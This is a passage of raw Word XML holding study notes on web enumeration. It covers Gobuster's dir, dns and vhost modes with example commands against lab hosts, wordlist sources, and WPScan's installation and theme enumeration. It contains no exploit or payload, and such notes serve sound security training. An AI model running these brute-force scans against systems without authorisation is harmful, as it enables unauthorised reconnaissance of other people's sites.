      </w:pPr>
      <w:r>
        <w:t>-z = - -no-progress = don’t display progress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CB72A0" w14:textId="523F8B0D" w:rsidR="00045C44" w:rsidRDefault="00045C44" w:rsidP="00045C44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>-q = - -quiet = don’t print banner and other noise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC6553A" w14:textId="64FA9E1B" w:rsidR="00045C44" w:rsidRDefault="00045C44" w:rsidP="00045C44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>-o = - -output = output file to write to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D907155" w14:textId="1F7BF5A5" w:rsidR="00074E88" w:rsidRDefault="00074E88" w:rsidP="00045C44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>-x = - -extensions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FF20CD" w14:textId="5CA2A571" w:rsidR="00045C44" w:rsidRDefault="00045C44" w:rsidP="00045C44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Gobuster Modes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B1B9D0" w14:textId="494AF5CD" w:rsidR="00045C44" w:rsidRDefault="00045C44" w:rsidP="00045C44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>dir mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC48B5E" w14:textId="43003964" w:rsidR="00045C44" w:rsidRDefault="00045C44" w:rsidP="00045C44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>enumerate website directories to see directory structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA6834C" w14:textId="7DB7DEF2" w:rsidR="00045C44" w:rsidRDefault="00045C44" w:rsidP="00045C44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>effective against common CMSs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68173436" w14:textId="77777777" w:rsidR="00045C44" w:rsidRPr="00045C44" w:rsidRDefault="00045C44" w:rsidP="00045C44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:r w:rsidRPr="00045C44">
        <w:t>gobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F0D2AB" w14:textId="1C592963" w:rsidR="00045C44" w:rsidRDefault="00045C44" w:rsidP="00045C44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>-u = url</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23956C92" w14:textId="718B82B8" w:rsidR="00045C44" w:rsidRDefault="00045C44" w:rsidP="00045C44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>-w = wordlist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1022CD80" w14:textId="00352155" w:rsidR="00074E88" w:rsidRDefault="00074E88" w:rsidP="00074E88">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:r w:rsidRPr="00074E88">
        <w:t>gobuster dir -u http://10.10.252.123/myfolder -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x.html,.css,.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077B3253" w14:textId="398F16C0" w:rsidR="00045C44" w:rsidRDefault="00074E88" w:rsidP="00074E88">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>-x = extensions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4168A90E" w14:textId="15319272" w:rsidR="00074E88" w:rsidRDefault="00074E88" w:rsidP="00074E88">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>WHEN HTTPS IS ENABLED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CBCF98" w14:textId="00752281" w:rsidR="00074E88" w:rsidRDefault="00074E88" w:rsidP="00074E88">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>need to use -k flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B970CD" w14:textId="0529B8B0" w:rsidR="00074E88" w:rsidRDefault="00074E88" w:rsidP="00074E88">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>dns mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9EF036" w14:textId="7C23CCB5" w:rsidR="00074E88" w:rsidRDefault="00074E88" w:rsidP="00074E88">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>brute-force subdomains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D67DE5" w14:textId="77777777" w:rsidR="00074E88" w:rsidRPr="00074E88" w:rsidRDefault="00074E88" w:rsidP="00074E88">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:r w:rsidRPr="00074E88">
        <w:t>gobuster dns -d http://mydomain.thm -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047140E8" w14:textId="1521CE10" w:rsidR="00074E88" w:rsidRDefault="00074E88" w:rsidP="00074E88">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>-d = domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEAFCDA" w14:textId="5711D1CB" w:rsidR="00074E88" w:rsidRDefault="00074E88" w:rsidP="00074E88">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>other useful flags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AA3F9F" w14:textId="4332224B" w:rsidR="00074E88" w:rsidRDefault="00074E88" w:rsidP="00074E88">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>-c = show cname (cannot be used with -i)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755A6C70" w14:textId="2C8A9E5E" w:rsidR="00074E88" w:rsidRDefault="00074E88" w:rsidP="00074E88">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>-i = show ips</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133343F2" w14:textId="575E9FCE" w:rsidR="00074E88" w:rsidRDefault="00074E88" w:rsidP="00074E88">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>-r = use custom DNS server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64258184" w14:textId="515CF9CB" w:rsidR="00074E88" w:rsidRDefault="007A6E65" w:rsidP="00074E88">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId16" w:anchor="dns-mode-help" w:history="1">
        <w:r w:rsidR="00074E88" w:rsidRPr="000C2180">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/OJ/gobuster#dns-mode-help</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="00D280B9" w14:textId="43580A0F" w:rsidR="00074E88" w:rsidRDefault="00074E88" w:rsidP="00074E88">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>vhost mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2386A76F" w14:textId="2517E4CB" w:rsidR="00074E88" w:rsidRDefault="00074E88" w:rsidP="00074E88">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>brute-force virtual hosts, similar to sub</w:t>
      </w:r>
      <w:r w:rsidR="00F9383C">
        <w:t>domains but IP based</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52427EC4" w14:textId="77777777" w:rsidR="00F9383C" w:rsidRPr="00F9383C" w:rsidRDefault="00F9383C" w:rsidP="00F9383C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F9383C">
        <w:t>gobuster vhost -u http://example.com -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B1049C" w14:textId="657604C0" w:rsidR="00F9383C" w:rsidRDefault="00F9383C" w:rsidP="00F9383C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Useful Wordlists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA118FB" w14:textId="646400B2" w:rsidR="00F9383C" w:rsidRDefault="00F9383C" w:rsidP="00F9383C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>/usr/share/wordlists/dirbuster or dirb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7B8D52" w14:textId="21B95963" w:rsidR="00F9383C" w:rsidRDefault="00F9383C" w:rsidP="00F9383C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Miessler SecLists on GitHub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA6E3FC" w14:textId="34BB8E1C" w:rsidR="00F9383C" w:rsidRDefault="007A6E65" w:rsidP="00F9383C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidR="00F9383C" w:rsidRPr="000C2180">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/danielmiessler/SecLists</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="132DA143" w14:textId="28066E77" w:rsidR="00F9383C" w:rsidRDefault="00F9383C" w:rsidP="00F9383C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>sudo apt install seclists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C883E1" w14:textId="725612C1" w:rsidR="00F9383C" w:rsidRDefault="00E422B9" w:rsidP="00F9383C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Introduction to WPScan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1A6EBF" w14:textId="4E2E93BC" w:rsidR="00E422B9" w:rsidRDefault="00E422B9" w:rsidP="00E422B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>capable of enumerating and researching security vulnerability categories present within Wordpress sites</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE67573" w14:textId="41C84B61" w:rsidR="00E422B9" w:rsidRDefault="00E422B9" w:rsidP="00E422B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Sensitive Information Disclosure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C00A00E" w14:textId="1BCE84AA" w:rsidR="00E422B9" w:rsidRDefault="00E422B9" w:rsidP="00E422B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Path Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC42E92" w14:textId="50EBAF3D" w:rsidR="00E422B9" w:rsidRDefault="00E422B9" w:rsidP="00E422B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Weak Password Policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAE99D6" w14:textId="4EF35DB4" w:rsidR="00E422B9" w:rsidRDefault="00E422B9" w:rsidP="00E422B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Presence of Default Installation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695E976F" w14:textId="30ADA489" w:rsidR="00E422B9" w:rsidRDefault="00E422B9" w:rsidP="00E422B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Testing Web Application Firewalls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108DF769" w14:textId="235365E2" w:rsidR="00E422B9" w:rsidRDefault="00E422B9" w:rsidP="00E422B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Installation of WPScan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517842F4" w14:textId="28DC71F8" w:rsidR="00E422B9" w:rsidRDefault="00E422B9" w:rsidP="00E422B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>sudo apt update &amp;&amp; sudo apt install wpscan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0CED6B" w14:textId="2A1E7771" w:rsidR="00E422B9" w:rsidRDefault="007A6E65" w:rsidP="00E422B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId18" w:anchor="install" w:history="1">
        <w:r w:rsidR="00E422B9" w:rsidRPr="000C2180">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/wpscanteam/wpscan#install</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="61FE44B0" w14:textId="035034B8" w:rsidR="00E422B9" w:rsidRDefault="00E422B9" w:rsidP="00E422B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>WPScan’s Database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37032C6B" w14:textId="263C887E" w:rsidR="00E422B9" w:rsidRDefault="00E422B9" w:rsidP="00E422B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>uses information within a local database as a primary reference point when enumerating for themes and plugins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4D0B55" w14:textId="4137720E" w:rsidR="00E422B9" w:rsidRDefault="00E422B9" w:rsidP="00E422B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>update database before scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071F6878" w14:textId="34FEE2D8" w:rsidR="00E422B9" w:rsidRDefault="00E422B9" w:rsidP="00E422B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>wpscan - -update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31515741" w14:textId="264CCC57" w:rsidR="00E422B9" w:rsidRDefault="00E422B9" w:rsidP="00E422B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>WPScan Modes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B47F45A" w14:textId="703AC70A" w:rsidR="00E422B9" w:rsidRDefault="00E422B9" w:rsidP="00E422B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Enumerating for Installed Themes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F2CC69" w14:textId="65586366" w:rsidR="00E422B9" w:rsidRDefault="00E422B9" w:rsidP="00E422B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Manually</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEA3206" w14:textId="43758F07" w:rsidR="00E422B9" w:rsidRDefault="00E422B9" w:rsidP="00E422B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>check network tab in developer tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFCDB09" w14:textId="1874D3AB" w:rsidR="00E422B9" w:rsidRDefault="00E422B9" w:rsidP="00E422B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>wp-content/themes/&lt;theme name&gt;/assets/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E8FEF1" w14:textId="4F3F9D4E" w:rsidR="00E422B9" w:rsidRDefault="00E422B9" w:rsidP="00E422B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
